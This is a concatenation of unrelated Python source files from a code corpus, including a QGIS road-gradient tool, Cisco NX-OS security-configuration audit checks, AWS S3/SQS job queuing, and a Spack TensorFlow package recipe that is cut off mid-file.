finance_ml/features/__init__.py | zli69/finance_ml | 51 | 12769680 | from .importance import feat_imp_MDA, feat_imp_MDI, feat_imp_SFI
from .orth import get_evec, ortho_feats
from .entropy import match_length, lempel_zib_lib, get_entropy_rate, plug_in, konto
from .fraction import get_opt_d, frac_diff_FFD | 1.015625 | 1 |
scripts/OshAdjustGradient.py | ebhoward/QgisIMPTools | 0 | 12769681 | """
***************************************************************************
OshAdjustGradient.py
---------------------
Date : Nov 2020
Copyright : (C) 2020 by <NAME>
Email : <EMAIL> at g<EMAIL> dot <EMAIL>
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
v2.11 16 Jan 2021
Fixed line 267 ZeroDivisionError
"""
__author__ = '<NAME>'
__date__ = 'Nov 2020'
__copyright__ = '(C) 2020, <NAME> Hai'
from qgis.PyQt.QtCore import QCoreApplication, QVariant
from qgis.core import (QgsProcessing,
QgsProcessingAlgorithm,
QgsProcessingContext,
QgsProcessingException,
QgsProcessingParameterBoolean,
QgsProcessingParameterVectorLayer,
QgsProcessingParameterFeatureSink,
QgsProcessingParameterNumber,
QgsProcessingParameterString,
QgsProcessingParameterVectorDestination,
QgsProcessingUtils,
QgsProcessingException,
QgsFeatureSink,
)
from qgis import processing
from qgis.core import (
QgsFeature,QgsField, QgsFields,
QgsGeometry, QgsGeometryUtils,
QgsProject, QgsProperty, QgsVectorLayer,
QgsExpressionContextUtils,
QgsLineSymbol,
QgsRendererCategory,
QgsCategorizedSymbolRenderer,
QgsSpatialIndex,
QgsVertexId,
QgsGeometryUtils )
class AdjustGradient(QgsProcessingAlgorithm):
INPUT = 'INPUT'
INPUT2 = 'INPUT2'
GRADLIM = 'GRADLIM'
AUTONAME = 'AUTONAME'
VISOFF = 'VISOFF'
OUTPUT = 'OUTPUT'
OUTPUT2 = 'OUTPUT2'
def createInstance(self):
return AdjustGradient()
def name(self):
return 'adjustgradient'
def displayName(self):
return ('Adjust segment gradient')
def group(self):
return ('IMP Tools')
def groupId(self):
return 'imp'
def shortHelpString(self):
return ('Adjust all road segment gradients and junction node elevations'
'\n'
'Adjust all road segment gradients to be not steeper than the input value. '
'Z values of segment endpoints and intermediate vertices are adjusted in the output layer. '
'Z values of nodes around adjusted segments are also adjusted in the output layer. '
'\n'
'The input Segmentz map layer must have a grad field.'
'\n'
'The algorithm works by adjusting the steepest segment down to the input steepness value. '
'Connected segments are then adjusted. '
'Following that, the algorithm adjusts the next steepest unconnected segment. '
'\n'
'If there are still steep segments after the algorithm have passed through all segments, the process is repeated. '
'A maximum of three iterations has been coded in the algorithm.'
)
def initAlgorithm(self, config=None):
self.addParameter(QgsProcessingParameterVectorLayer(
self.INPUT,'INPUT: Segment',
[QgsProcessing.TypeVectorLine],'Segmentz' ) )
self.addParameter(QgsProcessingParameterVectorLayer(
self.INPUT2,'INPUT2: Node',
[QgsProcessing.TypeVectorPoint],'Nodez' ) )
self.addParameter(QgsProcessingParameterNumber(
self.GRADLIM,'Not steeper than 1:' ,
defaultValue= 25) )
self.addParameter(QgsProcessingParameterBoolean(
self.AUTONAME,'Output auto naming ',
defaultValue=True))
self.addParameter(QgsProcessingParameterBoolean(
self.VISOFF,'Turn off other layers ',
defaultValue=True))
self.addParameter(QgsProcessingParameterFeatureSink(
self.OUTPUT,'Node_adjusted',
QgsProcessing.TypeVectorAnyGeometry ) )
self.addParameter(QgsProcessingParameterFeatureSink(
self.OUTPUT2,'Segment_adjusted',
QgsProcessing.TypeVectorAnyGeometry ) )
def processAlgorithm(self, parameters, context, feedback):
maxitera = 3 # maximum number of iterations (repeat for all segments)
seglay = self.parameterAsVectorLayer(parameters, self.INPUT, context)
if seglay is None:
raise QgsProcessingException(self.InvalidSourceError(parameters, self.INPUT))
nodelay = self.parameterAsVectorLayer(parameters, self.INPUT2, context)
if nodelay is None:
raise QgsProcessingException(self.InvalidSourceError(parameters, self.INPUT2))
self.gradlim = self.parameterAsInt(parameters, self.GRADLIM, context)
if self.gradlim is None:
raise QgsProcessingException(self.InvalidSourceError(parameters, self.gradlim))
autonaming = self.parameterAsBoolean( parameters, self.AUTONAME, context )
visibleoff = self.parameterAsBoolean( parameters, self.VISOFF, context )
# Node_adjusted output
newfields = QgsFields()
newfields.append(QgsField('id', QVariant.Int))
newfields.append(QgsField('z', QVariant.Double))
newfields.append(QgsField('oldz', QVariant.Double))
newfields.append(QgsField('adj', QVariant.Double))
(sink, self.dest_id) = self.parameterAsSink(
parameters,
self.OUTPUT,
context,
newfields,
1001, # PointZ wkbType
nodelay.sourceCrs()
)
# Segment_adjusted output
newfields = QgsFields()
newfields.append(QgsField('lid', QVariant.Int))
newfields.append(QgsField('wid', QVariant.Double))
newfields.append(QgsField('grad', QVariant.Double))
newfields.append(QgsField('styl', QVariant.Int))
newfields.append(QgsField('oldgrad', QVariant.Double))
(sink2, self.dest_id2) = self.parameterAsSink(
parameters,
self.OUTPUT2,
context,
newfields,
1002, # LineStringZ wkbType
seglay.sourceCrs()
)
# visible off
if visibleoff:
r = QgsProject.instance().layerTreeRoot()
layers = r.checkedLayers()
for lay in layers:
r.findLayer(lay.id()).setItemVisibilityChecked(False)
# Store into memory
d_idz={}
for f in nodelay.getFeatures():
id=f.id()
try:
z=f['z']
except:
raise QgsProcessingException('Error! Field: z not found in input node layer')
d_idz[id]=z
d_lidgrad={}
d_lidleng={}
lislidwkg=[]
d_lidgradwkg={}
d_lideid={}
d_lidsid={}
index = QgsSpatialIndex(nodelay.getFeatures())
for f in seglay.getFeatures():
lid=f['lid']
try:
grad=f['grad']
except:
raise QgsProcessingException('Error! Field: grad not found in input segment layer')
if not grad:
grad=9999
d_lidgrad[lid]=grad
lislidwkg.append(lid)
d_lidgradwkg[lid]=grad
lin = f.geometry().constGet()
pgeom = QgsGeometry(lin[0])
nearest = index.nearestNeighbor(pgeom, 1)
sid = nearest[0]
sz = d_idz[sid]
pgeom = QgsGeometry(lin[-1])
nearest = index.nearestNeighbor(pgeom, 1)
eid = nearest[0]
ez = d_idz[eid]
d_lidleng[lid]=f.geometry().constGet().length()
d_lidsid[lid]=sid
d_lideid[lid]=eid
# adjust next (steepest)
for itera in range(0,maxitera):
for lid in lislidwkg:
lid = min(d_lidgradwkg, key=d_lidgradwkg.get)
if d_lidgrad[lid] > self.gradlim:
break
d_lidgradwkg.pop(lid)
leng = d_lidleng[lid]
grad = d_lidgrad[lid]
ej = round( -(leng/grad - leng/self.gradlim),1)
eid = d_lideid[lid]
ez = d_idz[eid]
sid = d_lidsid[lid]
sz = d_idz[sid]
if ez<sz: # skip adjusting ez down if ez<sz
break
ezj = round((ez + ej),1)
if ezj==sz:
ng = 9999
else:
newgrad = abs(leng/(ezj-sz))
ng = round(newgrad,1)
d_lidgrad[lid]=ng
# update d_idz
d_idz[eid]=ezj
# update grad of connected segments
lidlisteid = [l for l,i in d_lideid.items() if i == eid]
lidlistsid = [l for l,i in d_lidsid.items() if i == eid]
lidlist = lidlisteid + lidlistsid
lidlist = list(dict.fromkeys(lidlist))
lidlist.remove(lid)
# print('lid',lid,'eid',eid,'connected lid\n',lidlist)
for lid in lidlist:
eid = d_lideid[lid]
sid = d_lidsid[lid]
ez = d_idz[eid]
sz = d_idz[sid]
leng = d_lidleng[lid]
oldgrad = d_lidgrad[lid]
if ez==sz:
newgrad=9999
else:
newgrad = abs(leng/(ez-sz))
d_lidgrad[lid] = round(newgrad,1)
# refill dict for next iteration
d_lidgradwkg = d_lidgrad.copy()
# adjust
for f in seglay.getFeatures():
geom = f.geometry()
lin = geom.constGet()
lid = f['lid']
wid = f['wid']
leng = lin.length()
eid = d_lideid[lid]
ez = d_idz[eid]
sid = d_lidsid[lid]
sz = d_idz[sid]
# reverse if ez<sz
if ez<sz:
# workaround to overcome Qgis crashing
geom=QgsGeometry(lin.reversed())
lin = geom.constGet()
temp = eid
eid = sid
sid = temp
d_lideid[lid] = eid
d_lidsid[lid] = sid
temp = ez
ez = sz
sz = temp
# insert z into vertices
lin.dropZValue()
lin.addZValue(0)
lin.setZAt(0,sz)
lin.setZAt(-1,ez)
n = lin.numPoints()
if n > 2:
for i in range(1,n-1):
v = QgsVertexId(0,0,i)
d = QgsGeometryUtils.distanceToVertex(lin,v)
z = d/leng * (ez-sz) + sz
lin.setZAt(i,z)
seglay.changeGeometry(f.id(), geom)
oldgrad = f['grad']
if not oldgrad:
oldgrad = 9999
grad = d_lidgrad[lid]
if grad<(self.gradlim-0.5):
styl = 1
elif grad!=oldgrad:
styl = 2
else:
styl = 0
if grad>50:
grad = round(grad,0)
if oldgrad>50:
oldgrad = round(oldgrad,0)
g = QgsFeature()
g.setGeometry(geom)
g.setAttributes([lid,wid, grad,styl,oldgrad])
sink2.addFeature(g, QgsFeatureSink.FastInsert)
i=0
feedback.pushInfo( '\n####################################\n' )
for f in nodelay.getFeatures():
id = f.id()
oldz = f['z']
z = d_idz[id]
adj = round( (oldz - z), 1 )
if adj !=0:
feedback.pushInfo( 'Node {} elevation adjusted {} meters'.format(id,adj) )
i+=1
geom = f.geometry()
p = geom.constGet()
p.setZ(z)
g = QgsFeature()
g.setGeometry(geom)
g.setAttributes([id,z,oldz,adj])
sink.addFeature(g, QgsFeatureSink.FastInsert)
feedback.pushInfo( '\nSEGMENTS AND ' + str(i) + ' NODES ADJUSTED' )
feedback.pushInfo( '\n\nOshAdjustGradient.py v2.11\n'
'####################################\n\n' )
if autonaming:
nodename = 'Node_' + str(self.gradlim)
segname = 'Segment_' + str(self.gradlim)
context.addLayerToLoadOnCompletion(self.dest_id,context.LayerDetails(
name=nodename,project=context.project() ))
context.addLayerToLoadOnCompletion(self.dest_id2,context.LayerDetails(
name=segname,project=context.project() ))
return {self.OUTPUT: self.dest_id, self.OUTPUT2: self.dest_id2}
def postProcessAlgorithm(self, context, feedback):
project = QgsProject.instance()
scope = QgsExpressionContextUtils.projectScope(project)
projfold = scope.variable('project_folder')
nodeqml = projfold + '\\qsettings\\Node_adjusted.qml'
segqml = projfold + '\\qsettings\\Segment_adjusted.qml'
layer2 = QgsProcessingUtils.mapLayerFromString(self.dest_id, context)
layer2.loadNamedStyle(nodeqml)
layer3 = QgsProcessingUtils.mapLayerFromString(self.dest_id2, context)
layer3.loadNamedStyle(segqml)
# necessary to customize categories based on self.gradlim input
# default style is only for self.gradlim = 25
catren = QgsCategorizedSymbolRenderer()
catren.setClassAttribute('styl')
linsym1 = QgsLineSymbol.createSimple( {'width':'1','color':'pink'} )
linsym2 = QgsLineSymbol.createSimple( {'width':'.8','color':'green'} )
linsym3 = QgsLineSymbol.createSimple( {'width':'.1','color':'blue'} )
exp1 = 'grad<'+str(self.gradlim-0.5)
exp2 = 'grad changed'
cat1 = QgsRendererCategory('1', linsym1, exp1)
cat2 = QgsRendererCategory('2', linsym2, exp2)
cat3 = QgsRendererCategory('0', linsym3, '')
catren.addCategory(cat1)
catren.addCategory(cat2)
catren.addCategory(cat3)
layer3.setRenderer(catren)
layer3.triggerRepaint()
return {self.OUTPUT: self.dest_id, self.OUTPUT2: self.dest_id2}
| 1.492188 | 1 |
high_dimensional_sampling/procedures.py | williamjameshandley/high-dimensional-sampling | 0 | 12769682 | <reponame>williamjameshandley/high-dimensional-sampling
from abc import ABC, abstractmethod
class Procedure(ABC):
"""
Abstract base class for all sampling procedures
All sampling procedure subjected to an experiment should be derived from this
class. It requires the implementation of the __init__, __call__ and
is_finished methods.
As it is an abstract base class, direct (i.e. not derived) instances of
this class cannot exist.
"""
@abstractmethod
def __init__(self):
"""
Initialisation method for instances of the Procedure class.
In this method anything can be put, but it should always at least
define a property store_parameters, containing the configuration
parameters of the procedure. The parameters indicated in this list are
then automatically logged at the start of an experiment. If no such
parameters exist, store_parameters should be an empty list.
This method can be overwritten and contain input arguments, but for
future compatibility all these input arguments should have defaults
set.
"""
self.store_parameters = []
@abstractmethod
def __call__(self, function):
"""
Call for the sampling of more data points.
This method queries the Procedure to sample new data points (or a
single new data point, whatever is more natural to the procedure). The
function to be sampled is provided as an argument.
Args:
function: An instance of a test function derived from the
TestFunction class. This function can be queried for values
and derivatives by calling the function with function(data) and
function(data, True) respectively.
Returns:
x: Sampled data in the form of a numpy.ndarray of shape
(nDatapoints, nVariables).
y: Function values for the samples datapoints of shape
(nDatapoints, ?)
"""
raise NotImplementedError
@abstractmethod
def is_finished(self):
"""
Checks if the procedure is finished with sampling.
This method is called at each iteration in the Experiment. When it
returns True, the experiment is stopped. As such, it can be used as a
check for convergence.
Returns:
A boolean that is True if the procedure is finished sampling. If
this happens, the experiment in which this Procedure is tested will
stop.
"""
raise NotImplementedError
@abstractmethod
def reset(self):
"""
Resets all internal settings to the defaults
"""
raise NotImplementedError
| 3.546875 | 4 |
setup.py | JevexEndo/qtdesign6 | 0 | 12769683 | import codecs
import os.path
import setuptools
with open("README.md", "r", encoding="utf-8") as fh:
long_description = fh.read()
def read(rel_path):
here = os.path.abspath(os.path.dirname(__file__))
with codecs.open(os.path.join(here, rel_path), "r") as fp:
return fp.read()
def get_version(rel_path):
for line in read(rel_path).splitlines():
if line.startswith("__version__"):
delim = '"' if '"' in line else "'"
return line.split(delim)[1]
else:
raise RuntimeError("Unable to find version string.")
setuptools.setup(
name="QtDesign6",
version=get_version("src\\QtDesign6\\__init__.py"),
author="Jevex",
author_email="<EMAIL>",
description="Custom widgets and utilities for PySide6",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/JevexEndo/qtdesign6",
project_urls={
"Bug Tracker": "https://github.com/JevexEndo/qtdesign6/issues",
},
classifiers=[
"Development Status :: 4 - Beta ",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
],
package_dir={"": "src"},
packages=setuptools.find_packages(where="src"),
python_requires=">=3.8",
)
| 1.742188 | 2 |
scripts/inline_examples.py | NHSDigital/fhir-converter | 0 | 12769684 | #!/usr/bin/env python
import json
import os
import sys
from jsonpath_ng import parse
from lxml import etree
SPEC_DIR = f"{os.path.dirname(os.path.realpath(__file__))}/../specification"
def main(file: str):
with open(file, 'r') as f:
spec = json.load(f)
req_path = parse("$.paths.['/$convert'].post.requestBody.content.*.examples.*.['$ref']")
req_examples = req_path.find(spec)
inline_examples(spec, req_examples)
res_path = parse("$.paths.['/$convert'].post.responses.*.content.*.examples.*.['$ref']")
res_examples = res_path.find(spec)
inline_examples(spec, res_examples)
print(json.dumps(spec))
def inline_examples(spec, examples_path):
for example in examples_path:
ref = example.full_path
example_file_content = read_example_from_component(spec, ref)
example_path = ref.left
example_path.update(spec, {"value": example_file_content})
def read_example_from_component(spec: dict, path):
component = path.find(spec)[0].value
com_path = component.replace("#/", "").replace("/", ".")
example_path = parse(f"$.{com_path}.value.['$ref']")
match = example_path.find(spec)[0].value
if match.endswith(".json") or match.endswith(".xml"):
with open(f"{SPEC_DIR}/{match}", "r") as example_content:
if match.endswith(".xml"):
return pretty_print_xml(example_content)
elif match.endswith(".json"):
return example_content.read()
def pretty_print_xml(content):
x = etree.parse(content)
return etree.tostring(x, pretty_print=True, encoding=str)
if __name__ == '__main__':
main(sys.argv[1])
| 2.734375 | 3 |
csc_checks.py | mvollandt/csc | 1 | 12769685 | # filename : csc_checks.py
# description : check definitions (security best practices and CVEs)
# create date : 2018-05-07 14:07:33.569768
csc1_1 = {'check_name': 'csc1_1',
'check_type': 'check_in_simple',
'match1': 'banner motd',
'match2': 'n/a',
'required': 'yes',
'result_ok': 'Test successful.',
'result_failed': 'Test failed.',
'info': 'A banner shoud be set',
'url': 'n/a',
'fix': 'Command to fix',}
csc1_2 = {'check_name': 'csc1_2',
'check_type': 'check_in_simple',
'match1': 'no cdp enable',
'match2': 'n/a',
'required': 'yes',
'result_ok': 'Test successful.',
'result_failed': 'Test failed.',
'info': 'CDP should not be enabled globally',
'url': 'n/a',
'fix': 'Command to fix',}
csc1_3 = {'check_name': 'csc1_3',
'check_type': 'check_in_simple',
'match1': 'snmpv1',
'match2': 'n/a',
'required': 'no',
'result_ok': 'Test successful.',
'result_failed': 'Test failed.',
'info': 'SNMP version 1 should not be configured',
'url': 'n/a',
'fix': 'Command to fix',}
csc1_4 = {'check_name': 'csc1_4',
'check_type': 'check_in_simple',
'match1': 'snmp-server host \d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3} traps version 2c',
'match2': 'n/a',
'required': 'yes',
'result_ok': 'Test successful.',
'result_failed': 'Test failed.',
'info': 'SNMP version 2c ',
'url': 'n/a',
'fix': 'Command to fix',}
csc1_5 = {'check_name': 'csc1_5',
'check_type': 'check_parameter',
'match1': 'ssh key rsa',
'match2': '2048',
'required': 'yes',
'result_ok': 'Test successful.',
'result_failed': 'Test failed.',
'info': 'RSA key length [2048]',
'url': 'n/a',
'fix': 'Command to fix',}
csc1_6 = {'check_name': 'csc1_6',
'check_type': 'check_in_simple',
'match1': 'no ssh key dsa',
'match2': 'n/a',
'required': 'yes',
'result_ok': 'Test successful.',
'result_failed': 'Test failed.',
'info': 'SNMP source interface [mgmt0]',
'url': 'n/a',
'fix': 'Command to fix',}
csc1_7 = {'check_name': 'csc1_7',
'check_type': 'check_parameter',
'match1': 'snmp-server source-interface traps',
'match2': 'mgmt0',
'required': 'yes',
'result_ok': 'Test successful.',
'result_failed': 'Test failed.',
'info': 'SNMP source interface [mgmt0]',
'url': 'n/a',
'fix': 'Command to fix',}
csc1_8 = {'check_name': 'csc1_8',
'check_type': 'check_parameter',
'match1': 'snmp-server location',
'match2': 'FR.*',
'required': 'yes',
'result_ok': 'Test successful.',
'result_failed': 'Test failed.',
'info': 'SNMP location string',
'url': 'n/a',
'fix': 'Command to fix',}
csc1_9 = {'check_name': 'csc1_9',
'check_type': 'check_parameter',
'match1': 'snmp-server host',
'match2': '\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}',
'required': 'yes',
'result_ok': 'Test successful.',
'result_failed': 'Test failed.',
'info': 'SNMP destination server',
'url': 'n/a',
'fix': 'Command to fix',}
csc1_10 = {'check_name': 'csc1_10',
'check_type': 'check_parameter',
'match1': 'snmp-server community',
'match2': 'your_community_string_here',
'required': 'yes',
'result_ok': 'Test successful.',
'result_failed': 'Test failed.',
'info': 'SNMP community string',
'url': 'n/a',
'fix': 'Command to fix',}
csc1_11 = {'check_name': 'csc1_11',
'check_type': 'check_parameter',
'match1': 'ntp server',
'match2': '\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}',
'required': 'yes',
'result_ok': 'Test successful.',
'result_failed': 'Test failed.',
'info': 'NTP server have to be configured',
'url': 'n/a',
'fix': 'Command to fix',}
csc1_12 = {'check_name': 'csc1_12',
'check_type': 'check_parameter',
'match1': 'ntp source-interface',
'match2': 'mgmt0',
'required': 'yes',
'result_ok': 'Test successful.',
'result_failed': 'Test failed.',
'info': 'NTP source interface [mgmt0]',
'url': 'n/a',
'fix': 'Command to fix',}
csc1_13 = {'check_name': 'csc1_13',
'check_type': 'check_in_simple',
'match1': 'no feature telnet',
'match2': 'n/a',
'required': 'yes',
'result_ok': 'Test successful.',
'result_failed': 'Test failed.',
'info': 'no feature telnet',
'url': 'n/a',
'fix': 'Command to fix',}
csc1_14 = {'check_name': 'csc1_14',
'check_type': 'check_in_simple',
'match1': 'password strength-check',
'match2': 'n/a',
'required': 'yes',
'result_ok': 'Test successful.',
'result_failed': 'Test failed.',
'info': 'password strength-check',
'url': 'n/a',
'fix': 'Command to fix',}
csc1_15 = {'check_name': 'csc1_15',
'check_type': 'check_in_simple',
'match1': 'password secure-mode',
'match2': 'n/a',
'required': 'yes',
'result_ok': 'Test successful.',
'result_failed': 'Test failed.',
'info': 'password secure-mode',
'url': 'n/a',
'fix': 'Command to fix',}
csc1_16 = {'check_name': 'csc1_16',
'check_type': 'check_in_simple',
'match1': 'no ssh key dsa',
'match2': 'n/a',
'required': 'yes',
'result_ok': 'Test successful.',
'result_failed': 'Test failed.',
'info': 'no ssh key dsa',
'url': 'n/a',
'fix': 'Command to fix',}
csc1_17 = {'check_name': 'csc1_17',
'check_type': 'check_in_simple',
'match1': 'aaa authentication login default group',
'match2': 'n/a',
'required': 'yes',
'result_ok': 'Test successful.',
'result_failed': 'Test failed.',
'info': 'aaa authentication login default group',
'url': 'n/a',
'fix': 'Command to fix',}
csc1_18 = {'check_name': 'csc1_18',
'check_type': 'check_in_simple',
'match1': 'aaa authentication login console group',
'match2': 'n/a',
'required': 'yes',
'result_ok': 'Test successful.',
'result_failed': 'Test failed.',
'info': 'aaa authentication login console group',
'url': 'n/a',
'fix': 'Command to fix',}
csc1_19 = {'check_name': 'csc1_19',
'check_type': 'check_in_simple',
'match1': 'no ip source-route',
'match2': 'n/a',
'required': 'yes',
'result_ok': 'Test successful.',
'result_failed': 'Test failed.',
'info': 'no ip source-route',
'url': 'n/a',
'fix': 'Command to fix',}
csc1_20 = {'check_name': 'csc1_20',
'check_type': 'check_in_simple',
'match1': 'no ip igmp snooping',
'match2': 'n/a',
'required': 'yes',
'result_ok': 'Test successful.',
'result_failed': 'Test failed.',
'info': 'no ip igmp snooping',
'url': 'n/a',
'fix': 'Command to fix',}
csc1_21 = {'check_name': 'csc1_21',
'check_type': 'check_in_simple',
'match1': 'exec-timeout 15',
'match2': 'n/a',
'required': 'yes',
'result_ok': 'Test successful.',
'result_failed': 'Test failed.',
'info': 'minimize axec timeout to 15s',
'url': 'n/a',
'fix': 'Command to fix',}
CVE_2018_0102 = {'check_name': 'CVE_2018_0102',
'check_type': 'check_two_parameters',
'match1': 'feature pong',
'match2': 'feature-set fabricpath',
'required': 'no',
'result_ok': 'Test successful.',
'result_failed': 'Test failed.',
'info': 'Affected versions: 7.2(2)d1(1), 7.2(2)d1(2), 7.2(1)d(1)',
'url': 'https://www.cvedetails.com/cve/CVE-2018-0102/',
'fix': 'Command to fix',}
CVE_2018_0090 = {'check_name': 'CVE_2018_0090',
'check_type': 'check_two_parameters',
'match1': 'cisco Nexus(20|30|55|56|60|70|77)00',
'match2': 'access-list',
'required': 'no',
'result_ok': 'Test successful.',
'result_failed': 'Test failed.',
'info': 'Affected versions: 7.3(2)n1(0.6), 8.3(0)kms(0.31), 8.8(3.5)s0',
'url': 'https://www.cvedetails.com/cve/CVE-2018-0090/',
'fix': 'Command to fix',}
CVE_2018_0092 = {'check_name': 'CVE_2018_0092',
'check_type': 'check_two_parameters',
'match1': 'cisco Nexus(30|36|90|95)00',
'match2': 'role network-operator',
'required': 'yes',
'result_ok': 'Test successful.',
'result_failed': 'Test failed.',
'info': 'Affected versions: 7.0(3)i5(2), 7.0(3)i6(1), 7.0(3)i7(1)',
'url': 'https://www.cvedetails.com/cve/CVE-2018-0092/',
'fix': 'Command to fix',}
CVE_2017_12341 = {'check_name': 'CVE_2017_12341',
'check_type': 'check_in_simple',
'match1': '8.1\(1\)|8.2\(1\)|8.1\(0.59\)s0',
'match2': 'n/a',
'required': 'no',
'result_ok': 'Test successful.',
'result_failed': 'Test failed.',
'info': 'Affected versions: 8.1(1), 8.2(1), 8.1(0.59)s0',
'url': 'https://www.cvedetails.com/cve/CVE-2017-12341/',
'fix': 'Command to fix',}
CVE_2017_12331 = {'check_name': 'CVE_2017_12331',
'check_type': 'check_two_parameters',
'match1': 'cisco Nexus(70|77)00',
'match2': '8.1\(1\)',
'required': 'no',
'result_ok': 'Test successful.',
'result_failed': 'Test failed.',
'info': 'Affected versions: 8.1(1)',
'url': 'https://www.cvedetails.com/cve/CVE-2017-12331/',
'fix': 'Command to fix',}
| 1.640625 | 2 |
Albedo/AlbedoPh1Queue.py | bradrubin/PycharmProjects | 0 | 12769686 | bucketName = 'org.cicsnc.albedo'
basePath = 'Input/area/'
satellite = 'goes13'
year = '2017'
startDay = 1
endDay = 10
filterBand = 'BAND_01'
dryrun = False
import re
from os import fdopen, remove
from shutil import move
from tempfile import mkstemp
import boto3
def replace(file_path, pattern, subst):
fh, abs_path = mkstemp()
with fdopen(fh, 'w') as new_file:
with open(file_path) as old_file:
for line in old_file:
new_file.write(re.sub(pattern, subst, line))
remove(file_path)
move(abs_path, file_path)
def removePrefix(text, prefix):
return text[text.startswith(prefix) and len(prefix):]
def getS3FileNames(bucket, folder):
keys = []
kwargs = {'Bucket': bucket, 'Prefix': folder}
while True:
resp = s3.list_objects_v2(**kwargs)
for obj in resp['Contents']:
keys.append(obj['Key'])
try:
kwargs['ContinuationToken'] = resp['NextContinuationToken']
except KeyError:
break
return keys
if satellite == 'goes08' or 'goes12' or 'goes13' or 'goes14':
startTimeA = 0
endTimeA = 130
startTimeB = 730
endTimeB = 2359
replace('../ancillary.src/AlgorithmConfigurationFile_docker', 'GRIDID=GOES_..._VIS02', 'GRIDID=GOES_075_VIS02')
elif satellite == 'goes09' or 'goes10' or 'goes11' or 'goes15':
startTimeA = 0
endTimeA = 530
startTimeB = 1130
endTimeB = 2359
replace('../ancillary.src/AlgorithmConfigurationFile_docker', 'GRIDID=GOES_..._VIS02', 'GRIDID=GOES_135_VIS02')
else:
print("Invalid satellite setting")
exit(-1)
s3 = boto3.client('s3')
s3.upload_file("../ancillary.src/AlgorithmConfigurationFile_docker", bucketName, "AlgorithmConfigurationFile_docker")
fileNames = getS3FileNames(bucketName, basePath)
fileNames = map(lambda d: removePrefix(d, basePath), fileNames)[1:]
fileNames = filter(lambda f: f.startswith(satellite), fileNames)
fileNames = filter(lambda f: f.endswith(filterBand), fileNames)
fileNames = filter(lambda f: f[7:11] == year, fileNames)
days = list("%03d" % day for day in range(startDay, endDay + 1))
fileNames = [x for x in fileNames if x[12:15] in days]
timesA = list("%04d" % time for time in range(startTimeA, endTimeA + 1))
timesB = list("%04d" % time for time in range(startTimeB, endTimeB + 1))
fileNames = [x for x in fileNames if x[16:20] in timesA + timesB]
client = boto3.client('sqs', region_name='us-east-1')
queues = client.list_queues(QueueNamePrefix='AlbedoPh1')
queueURL = queues['QueueUrls'][0]
for fileName in fileNames:
print(fileName)
if not dryrun:
enqueueResponse = client.send_message(QueueUrl=queueURL, MessageBody=fileName)
print(len(fileNames))
| 1.851563 | 2 |
tests/modin/modin_tests.py | sumanthratna/nlu | 1 | 12769687 | <reponame>sumanthratna/nlu
import unittest
import pandas as pd
import numpy as np
import modin.pandas as mpd
import numpy as np
import nlu
import sparknlp
import pyspark
class MyTestCase(unittest.TestCase):
def test_print_pipe_info(self):
# ## works with RAY and DASK backends
data = {"text": ['This day sucks but tomorrow will be better ! ', 'I love this day', 'I dont like Sami']}
mdf = mpd.DataFrame(data)
res = nlu.load('sentiment').predict(mdf)
print(res)
self.assertTrue(type(res) == mpd.DataFrame)
pdf = pd.DataFrame(data)
res = nlu.load('sentiment').predict(pdf)
print(res)
self.assertTrue(type(res) == pd.DataFrame)
print('TESTING SDF')
sdf = nlu.spark.createDataFrame(pdf)
res = nlu.load('sentiment', verbose=True).predict(sdf)
self.assertTrue(type(res) == pyspark.sql.dataframe.DataFrame)
res.show()
if __name__ == '__main__':
MyTestCase().test_entities_config()
| 2.8125 | 3 |
backend/resolver/resolver.py | bb111189/Tora-Zilliqa | 0 | 12769688 | # -*- coding:utf-8 -*-
# Copyright 2019 TEEX
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
from backend.dispatcher.request_dispatcher import RequestDispatcher
import time
import threading
class Resolver(threading.Thread):
def __init__(self, monitors, configs):
threading.Thread.__init__(self)
self.monitors = monitors
self.dispatcher = RequestDispatcher(configs)
def run(self):
while True:
for monitor in self.monitors:
request = monitor.get_front_request()
if request is not None:
# resolve the request params
# dispatch the request
self.dispatcher.dispatch_request(request)
else:
time.sleep(1)
| 2.390625 | 2 |
var/spack/repos/builtin/packages/tensorflow/package.py | electronicvisions/spack | 2 | 12769689 | from spack import *
from glob import glob
import os
class Tensorflow(Package):
"""TensorFlow is an Open Source Software Library for Machine Intelligence"""
homepage = "https://www.tensorflow.org"
url = "https://github.com/tensorflow/tensorflow/archive/v0.10.0.tar.gz"
version('2.0.0-alpha0', 'a26886611105d3399c2a5985fe14d904')
version('1.13.1', '0fd6bd88f880c1d907e0bd898b37ee1b', preferred=True)
version('1.12.0', '48164180a2573e75f1c8dff492a550a0')
version('1.9.0', '3426192cce0f8e070b2010e5bd5695cd')
version('1.8.0', 'cd45874be9296644471dd43e7da3fbd0')
version('1.6.0', '6dc60ac37e49427cd7069968da42c1ac')
version('1.5.0', 'e087dc1f47dbbda87cf4278acddf785b')
version('1.3.0', '01c008c58d206324ef68cd5116a83965')
version('1.2.0', '3f15746caabfd2583724258643fd1678')
version('1.1.0', 'fb745649d33954c97d29b7acaffe7d65')
version('1.0.0-rc2', 'a058a7e0ba2b9761cf2420c82d520049')
version('0.10.0', 'b75cbd494d61a809af5ef25d7fba561b')
depends_on('swig', type='build')
# old tensorflow needs old bazel
depends_on('bazel@0.19.0', type='build', when='@1.13.0:')
depends_on('bazel@0.15.0', type='build', when='@1.8.0:1.12.0')
depends_on('bazel@0.9.0', type='build', when='@1.5.0:1.6.0')
depends_on('bazel@0.4.5', type='build', when='@1.2.0:1.3.0')
depends_on('bazel@0.4.4:0.4.999', type='build', when='@1.0.0:1.1.0')
depends_on('bazel@0.3.1:0.4.999', type='build', when='@:1.0.0')
extends('python')
depends_on('py-setuptools', type=('build', 'run'))
